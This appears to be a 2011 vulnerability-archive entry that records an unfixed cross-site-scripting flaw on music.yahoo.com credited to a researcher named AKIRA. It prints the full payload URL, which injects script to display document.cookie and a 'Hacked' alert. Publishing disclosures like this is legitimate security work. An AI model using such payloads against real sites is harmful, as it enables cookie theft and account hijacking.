Security researcher AKIRA, has submitted on 09/09/2011 a cross-site-scripting (XSS) vulnerability affecting music.yahoo.com, which at the time of submission ranked 4 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 09/09/2011 |
Date published: 11/12/2011 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: AKIRA |
Domain: music.yahoo.com |
Category: XSS |
Pagerank: 4 |
|---|
URL: http://music.yahoo.com/eda/42778155/default.asp?id=%27%3C/SCRIPT%3E%3Cscript%20type=%22text/javascri
pt%22%3Ejavascript:alert%28%27AKIRA%27%29;javascript:alert%28document.cookie%29;javascript:alert%28%
27Hacked%27%29;%3C/script%3E |
|
Click here to view the mirror
|
|
|
| 
